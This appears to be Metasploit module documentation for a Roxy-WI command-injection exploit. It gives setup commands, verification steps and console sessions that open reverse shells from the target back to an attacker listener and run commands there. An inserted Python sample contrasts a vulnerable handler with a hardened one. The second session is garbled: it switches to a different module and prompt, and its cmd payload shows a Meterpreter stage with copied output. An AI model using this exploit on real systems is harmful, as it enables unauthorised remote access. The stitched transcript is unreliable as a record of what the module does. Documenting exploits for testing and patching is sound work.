Vulnerable Application
Description
This module exploits a command injection vulnerability to achieve remote code execution. Unauthenticated users can execute a terminal command in the context of the web server user.
In versions 6.1.1.0 and earlier, an unauthenticated user can execute some methods of administrator functions without needing any credentials. Due to the nature of the vulnerability, an adversary can change parts of the web page, hijack an administrator account, or execute operating system commands in the context of the web server user.
Technical details about the vulnerability can be found here.
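The two flaws described above (an administrator action reachable without a session, and a request value reaching a shell) are shown here as a minimal Python handler beside a hardened form. This is an added illustration, not Roxy-WI's code; the function names, the `server` parameter and the `echo` stand-in command are assumptions.

```python
import re
import subprocess

# Hypothetical handler names and parameter; this is not Roxy-WI's code.
# Allowlist for a host label: must start alphanumeric, so a value can
# neither carry shell metacharacters nor begin with '-' (option injection).
SERVER_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,62}")


def handle_vulnerable(form, session):
    """'Before' pattern: no session check, request value pasted into a shell string."""
    cmd = "echo show backend for %s" % form["server"]
    # shell=True hands the whole string to /bin/sh, so ';', '|' or '$()'
    # inside the request value is interpreted as shell syntax.
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def handle_hardened(form, session):
    """Fix: authenticate first, validate the value, run argv without a shell."""
    if not session.get("user"):
        raise PermissionError("login required")
    server = form.get("server", "")
    if not SERVER_RE.fullmatch(server):
        raise ValueError("invalid server name")
    # List form: each element is one argument, no shell parsing takes place.
    argv = ["echo", "show backend for", server]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    crafted = {"server": "lb1; echo INJECTED"}  # constructed sample input
    print("vulnerable:", handle_vulnerable(crafted, {}).splitlines())
    for form, session in [(crafted, {}), (crafted, {"user": "admin"}),
                          ({"server": "lb1"}, {"user": "admin"})]:
        try:
            print("hardened:", handle_hardened(form, session).strip())
        except (PermissionError, ValueError) as exc:
            print("hardened rejected:", exc)
```

The session check and the input validation are independent controls: authentication alone would still leave the injection reachable by any logged-in user.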
Setup
Roxy-WI requires Python and a web server to run. Please visit the following URL for the required Python version and other packages.
https://roxy-wi.org/installation.py
cd /var/www
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
chmod +x haproxy-wi/app/*.py
sudo ./haproxy-wi/app/create_db.py
chown -R www-data:www-data haproxy-wi
Options
Verification Steps
- Install the application
- Start msfconsole
- Do: use exploit/linux/http/roxy_wi_exec
- Set RHOST
- Set LHOST
- Set USERNAME
- Set PASSWORD
- Run exploit
- Do: run
- You should get a shell.
- Verify that you are getting meterpreter session.
Targets
- 0: Python payload
- 1: Command payload
Scenarios
msf6 >
msf6 > use exploit/linux/http/roxy_wi_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Checking if 192.168.56.116:443 is vulnerable!
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[+] Exploit successfully executed.
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:35490) at 2022-07-19 14:13:41 +0300
meterpreter > ls
Listing: /var/www/haproxy-wi/app
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
You can also use cmd payloads.
msf6 >
msf6 > use exploit/linux/http/roxy_wi_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/mailcleaner_exec) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Checking if 192.168.56.116:443 is vulnerable!
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[+] Exploit successfully executed.
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:35490) at 2022-07-19 14:13:41 +0300
id
uid=1000(xxx) gid=1000(xxx) groups=1000(xxx)